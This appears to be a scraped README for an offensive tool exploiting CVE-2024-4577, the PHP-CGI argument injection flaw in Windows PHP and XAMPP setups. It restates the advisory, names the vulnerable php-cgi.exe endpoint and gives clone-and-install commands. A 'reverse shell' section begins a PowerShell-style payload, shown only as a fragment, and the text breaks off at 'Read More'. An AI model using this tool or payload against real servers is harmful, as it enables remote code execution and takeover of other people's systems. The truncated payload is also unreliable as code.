PHP CGI Argument Injection (CVE-2024-4577) RCE ## 📜 Description In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc. "XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode." ## 📚 Table of Contents – 📜 [Description](#-description) – 🛠️ [Installation](#-installation) – ⚙️ [Usage](#-usage) – 💁 [References](#-references) ## 🛠️ Installation “`bash $ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git $ cd CVE-2024-4577-RCE && pip install -r requirements.txt “` ## ⚙️ Usage  ## 🤖 Establishing reverse shell ### PHP Payload > [!NOTE] > This tool demonstrates realistic attack techniques (TTPs). However this specific payload sample does not function in this scenario. “`php # rev_shell.php &1 | Out-String );$sendback2 =…Read More